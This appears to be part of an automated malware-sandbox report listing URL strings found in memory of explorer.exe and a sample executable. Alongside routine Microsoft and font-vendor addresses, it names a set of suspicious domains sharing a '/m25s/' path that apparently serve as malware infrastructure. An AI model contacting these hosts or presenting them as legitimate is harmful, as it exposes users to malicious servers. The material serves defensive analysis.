          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net/m25s/www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.netReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.online/m25s/www.6uzh.digital
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pslag-hal-2.onlineReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bond/m25s/www.pslag-hal-2.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.raphic-design-degree-33148.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/www.ehills.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.todayReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop
          Source: explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shop/m25s/www.pringhillinfos.net
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uykoii.shopReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/www.armanshop.xyz
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.netReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.ierra777.vip
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.oches-a-credito-es.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyzReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bond/m25s/www.araghospitality.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yeloma-treatment-82106.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000004.00000000.1716978522.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2638429604.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4159088871.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2664758561.0000000004EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k6
          Source: explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4159088871.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2664758561.0000000004EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000971D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2692315620.0000000009583000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004EAA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000095A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009658000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000965F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.2633149369.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.3928998336.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.0000000009569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?K
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000095A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2696073472.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000965F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2819234909.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.0000000009569000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009658000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.000000000965F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000004.00000002.2633149369.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com2025-01-10T1
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1716978522.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
